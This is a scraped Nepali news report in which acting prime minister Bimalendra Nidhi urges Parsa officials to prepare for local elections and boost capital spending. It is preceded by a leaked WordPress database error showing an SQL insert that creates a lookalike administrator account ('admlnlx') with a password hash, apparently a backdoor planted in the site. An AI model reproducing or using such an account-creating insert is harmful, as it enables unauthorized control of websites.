WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLPQTzpJQ52N5dW5cTKPCEDfe8pr6S.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 01:10:33', '', 'admlnlx', 'admlnlx')
वीरगन्ज, माघ ३ –
कार्यबाहक प्रधानमन्त्री विमलेन्द्र निधिले जुनसुकैबेला पनि स्थानीय निकायको निर्वाचन हुन सक्ने भएकाले यसलाई सफल पार्न राष्ट्रसेवक कर्मचारीहरु तयारी भएर बस्नुपर्ने बताउनुभएको छ । जिल्ला प्रशासन कार्यालय, पर्सामा आज कार्यालय प्रमुखहरुलाई निर्देशन दिँदै मन्त्री निधिले संविधान संशोधन प्रक्रिया अगाडि बढिसकेकाले जुनसुकै बेला स्थानीय निकाय निर्वाचनका घोषणा हुनसक्ने विश्वास व्यक्त गर्नुभयो ।
आर्थिक कारोबारका लागि वीरगन्ज राष्ट्रियस्तरमा महत्वपूर्ण भएकाले यहाँ भइरहेका विकासका कामलाई दु्रत गतिमा अगाडि बढाउनुपर्नेमा जोड दिँदै मन्त्री निधिले पुँजीगत खर्च भएन भन्ने विषय बारम्बार मन्त्रिपरिषद्को बैठकमा उठ्ने गरेकाले पुँजीगत खर्चमा वृद्धि गरी राजस्व वृद्धिमा ध्यान दिनुपर्ने बताउनुभयो । उहाँले एउटै प्रज्ञापनपत्रमा व्यापारीहरुले पटकपटक सामान आयात गर्ने गरेकाले सम्बन्धित निकायले यस्तो कार्यलाई रोक्नुपर्ने बताउनुभयो ।
यसअघि मन्त्री निधिले मध्यमाञ्चलका सुरक्षा निकायका प्रमुखहरुसँग सुरक्षास्थितिबारे जानकारी दिँदै सुरक्षा व्यवस्थालाई चुस्त दुरुस्त पार्नुपर्छ भनी निर्देशन दिनुभयो । यसैगरी मन्त्री निधिले नेपाली काँग्रेस, पर्साका कार्यकर्तालाई सम्बोधन गर्दै संविधान संशोधन प्रक्रिया अगाडि बढिरहेका बेला नेकपा (एमाले)ले मधेसमा भ्रम सिर्जना गरिरहेकाले यसप्रति सजग रहन सबैसँग आग्रह गर्नुभयो । रासस